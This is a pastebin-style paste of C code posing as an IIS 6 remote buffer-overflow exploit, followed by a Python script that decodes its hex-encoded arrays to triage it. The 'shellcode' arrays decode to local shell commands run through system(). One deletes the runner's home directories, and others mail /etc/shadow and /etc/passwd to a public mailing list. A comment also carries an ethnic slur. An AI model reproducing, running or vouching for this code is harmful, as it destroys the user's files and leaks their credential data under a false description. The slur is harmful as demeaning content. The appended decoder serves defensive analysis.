- /* Proof of concept code
- Please don't send us e-mails
- asking us "how to hack" because
- we will be forced to skullfsck you.
- DISCLAIMER:
- !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
- IIS 6 Buffer Overflow Exploit
- BUG: inetinfo.exe improperly bound checks
- http requests sent longer than 6998 chars.
- Can get messy but enough testing, and we have
- found a way in.
- VENDOR STATUS: Notified
- FIX: In process
- Remote root.
- eg.
- #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
- + Connecting to host...
- + Connected.
- + Inserting Shellcode...
- + Done...
- + Spawining shell..
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- C:>
- */
- char shellcode[] =
- "x2fx62x69x6ex2fx72x6dx20"
- "x2dx72x66x20x2fx68x6fx6d"
- "x65x2fx2ax3bx63x6cx65x61"
- "x72x3bx65x63x68x6fx20x62"
- "x6cx34x63x6bx68x34x74x2c"
- "x68x65x68x65";
- char launcher [] =
- "x63x61x74x20x2fx65x74x63x2fx73"
- "x68x61x64x6fx77x20x7cx6dx61x69"
- "x6cx20x66x75x6cx6cx2dx64x69"
- "x73x63x6cx6fx73x75x72x65x40"
- "x6cx69x73x74x73x2ex67x72x6fx6b"
- "x2ex6fx72x67x2ex75x6bx20";
- char netcat_shell [] =
- "x63x61x74x20x2fx65x74x63x2fx70"
- "x61x73x73x77x64x20x7cx6dx61x69"
- "x6cx20x66x75x6cx6cx2dx64x69"
- "x73x63x6cx6fx73x75x72x65x40"
- "x6cx69x73x74x73x2ex67x72x6fx6b"
- "x2ex6fx72x67x2ex75x6bx20";
- main()
- {
- //Section Initialises designs implemented by mexicans
- //Imigrate
- system(launcher);
- system(netcat_shell);
- system(shellcode);
- //int socket = 0;
- //double long port = 0.0;
- //#DEFINE port host address
- //#DEFINE number of inters
- //#DEFINE gull eeuEE
- // for(int j; j < 30; j++)
- {
- //Find socket remote address fault
- printf(".");
- }
- //overtake inetinfo here IIS_666666^
- return 0;
- }
By: tezt | Date: Mar 25 2008 21:04 | Format: None | Expires: never | Size: 1.91 KB | Hits: 1393
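A check worth running on any downloaded proof of concept before compiling it, shown here as an added example that is not part of the paste: it decodes every hex-escaped char array and flags the ones that are plain ASCII text handed to `system()`, which run on the local machine rather than on any remote target. The function names, the `padding` array and the tolerance for missing backslashes are assumptions made for this example.

```python
import re

# Constructed input: the launcher array and its system() call as the paste shows
# them (backslashes lost, list markers dropped), plus one made-up array, padding.
PASTE = '''
char launcher [] =
"x63x61x74x20x2fx65x74x63x2fx73"
"x68x61x64x6fx77x20x7cx6dx61x69"
"x6cx20x66x75x6cx6cx2dx64x69"
"x73x63x6cx6fx73x75x72x65x40"
"x6cx69x73x74x73x2ex67x72x6fx6b"
"x2ex6fx72x67x2ex75x6bx20";
char padding [] = "x90x90xccxc3";
main()
{
system(launcher);
}
'''

ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"[^"]*"\s*)+);')
HEX_RE = re.compile(r'\\?x([0-9a-fA-F]{2})')   # accepts \x41 and a stripped x41
SYSTEM_RE = re.compile(r'\bsystem\s*\(\s*(\w+)\s*\)')

def decode_arrays(source):
    """Map each char array name to the bytes its hex escapes encode."""
    return {name: bytes(int(h, 16) for h in HEX_RE.findall(body))
            for name, body in ARRAY_RE.findall(source)}

def triage(source):
    """Flag arrays that decode to printable ASCII and are passed to system()."""
    executed = set(SYSTEM_RE.findall(source))
    findings = []
    for name, raw in decode_arrays(source).items():
        printable = bool(raw) and all(0x20 <= b < 0x7F for b in raw)
        findings.append({
            "name": name,
            "text": raw.decode("latin-1"),
            "printable_ascii": printable,
            "passed_to_system": name in executed,
            # Machine code is rarely all-printable; a local shell command is.
            "suspicious": printable and name in executed,
        })
    return findings

if __name__ == "__main__":
    for f in triage(PASTE):
        verdict = "LOCAL SHELL COMMAND" if f["suspicious"] else "ok"
        print(f'{f["name"]:10} {verdict:20} {f["text"]!r}')
```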